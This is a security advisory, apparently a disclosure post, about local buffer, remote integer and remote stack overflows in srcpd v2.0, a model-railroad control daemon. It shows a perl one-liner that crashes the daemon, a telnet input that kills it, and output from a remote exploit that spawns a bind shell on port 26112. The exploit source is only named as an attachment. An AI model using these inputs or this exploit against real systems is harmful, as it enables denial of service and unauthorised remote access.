[m00 SA001]: Buffer overflows in srcpd

[Over_G <overg () mail ru>]

/***********************************************
*
*            m00 security advistory #001
*
*          Buffer overflows in Srcpd v2.0
*
*              www.m00security.org
*
*       overg[at]mail.ru    h0snp[at]mail.ru
*
************************************************/

---------------------------------------
Product: srcpd
Version: 2.0 (other ?)
OffSite: http://srcpd.sourceforge.net
Problem: buffer & integer overflows.
---------------------------------------

Vulnerability file:
/usr/sbin/srcpd


Description the package:

The srcpd is a server daemon that enables
you to control and play with a digital model
railroad using any SRCP Client. Actually 
it supports an Intellibox (tm), a Marklin
Interface 6050 or 6051 (tm?), and many more 
interfaces. More information about SRCP and 
links to many really cool clients (and other 
servers for different hardware) can be found 
at http://srcpd.sourceforge.net and 
http://www.der-moba.de/Digital 
This is a beta release, do not use for production!

SRCP - Simple Railroad Command Protocol.


1. Local buffer overflow.

In File srcpd.c length 'conffile' = MAXPATHLEN.
If 'conffile' > MAXPATHLEN then srcpd is 'crashed'.

[over@localhost m00]$ /usr/sbin/srcpd -f `perl -e 'print "A" x 10000'`

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 1197)]
0x420d2a44 in _getopt_internal () from /lib/i686/libc.so.6


2. Remote integer overflow.

[over@localhost m00]$ telnet localhost 12340
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
srcpd V2; SRCP 0.8.2
go 11111111
1060333759.411 200 OK GO 1
go 11111111
Connection closed by foreign host.

[over@localhost m00]$ telnet localhost 12340
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused


3. Remote stack overflow/command execution.

There are multiply stack overflow vulnerabilities in method
handlers. For example, handleSET() , handleGET() and other. 
Therefore we can smash the stack and get a shell.
See code for more info...

Remote exploit attached.

example:

[h0snp@h0m3 srcpd]$ ./m00-srcpd -h localhost -t 0
 ** ***************************************** **
 ** Srcpd v2.0 remote exploit by m00 Security **
 ** ***************************************** **
 Conneting...OK
 using RET = 0xbf1fcb61
 now, if you was lucky with ret, shell spawned on 26112.
[h0snp@h0m3 srcpd]$ telnet localhost 26112
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
id;
uid=500(h0snp) gid=500(h0snp) groups=500(h0snp)


(c) m00 Security / Over_G & h0snp

Attachment: m00-srcpd.c
Description: